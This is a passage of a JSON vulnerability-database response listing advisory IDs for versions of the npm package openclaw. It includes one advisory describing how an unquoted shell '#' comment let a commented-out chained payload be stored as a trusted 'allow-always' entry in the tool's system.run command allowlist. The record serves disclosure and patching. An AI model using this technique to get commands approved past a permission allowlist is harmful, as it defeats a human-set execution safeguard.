rability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulner
ability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulner
ability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulner
ability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulner
ability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35639","GHSA-hf68-49fm-59cq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eda1-pnhb-bqes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50759?format=json","vulnerability_id":"VCID-edn6-zer1-cya4","summary":"OpenClaw: system.run allow-always persistence included shell-commented payload tails\nOpenClaw's `system.run` allowlist analysis did not honor POSIX shell comment semantics when deriving `allow-always` persistence entries.\n\nA caller in `security=allowlist` mode who received an `allow-always` decision could submit a shell command whose tail was commented out at runtime, for example by using an unquoted `#` before a chained payload. The runtime shell would execute only the pre-comment portion, but allowlist persistence could still analyze and store the non-executed tail as a trusted follow-up command.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `939b18475d734ed75173f59507e3ebbdfe1992b7` by teaching shell tokenization and chain/pipeline analysis to stop at unquoted shell comments, so allow-always persistence now tracks only commands that the shell can actually execute. 
Normal real chained commands and quoted `#` literals continue to work.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/939b18475d734ed75173f59507e3ebbdfe1992b7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/939b18475d734ed75173f59507e3ebbdfe1992b7"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-9q2p-vc84-2rwm","reference_id":"GHSA-9q2p-vc84-2rwm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q2p-vc84-2rwm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q2p-vc84-2rwm","reference_id":"GHSA-9q2p-vc84-2rwm","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/adviso
ries/GHSA-9q2p-vc84-2rwm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-w
beq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-a
bbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-u
yfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-p
fan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6
ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-q
